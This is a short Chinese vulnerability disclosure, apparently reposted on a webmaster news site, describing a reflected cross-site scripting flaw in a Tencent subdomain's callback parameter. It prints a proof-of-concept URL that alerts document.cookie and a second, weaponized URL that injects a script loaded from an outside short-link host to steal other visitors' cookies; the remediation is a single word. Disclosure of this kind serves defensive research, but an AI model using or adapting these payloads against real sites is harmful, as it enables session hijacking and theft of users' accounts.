腾讯某分站反射型跨站下载

黑吧安全网

腾讯分站反射型跨站可获取小甜饼

详细说明：

1：访问http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=alert%28document.cookie%29%3E&_=1376185737425

漏洞证明：

2：构造获取cookie的链接：

http://sync.coral.qq.com/t/1000269489?source=1&callback=1014xxx%3Csvg/onload=%22var/**/s=document.createElement%28%27script%27%29;s.src=%27http://t.cn/zl70EH3%27;document.body.appendChild%28s%29;%22%3E&_=1376185737425

可获取别人cookie：

修复方案：

过滤！！

上一篇：海尔集团之14某非常重要系统很有姿势的SQL注射下载

下一篇： Haier CRM后台管理系统未授权访问下载

当前位置：站长啦网站目录 » 站长资讯 » 站长新闻 » 漏洞预警 » 文章详细

推荐文章

推荐网站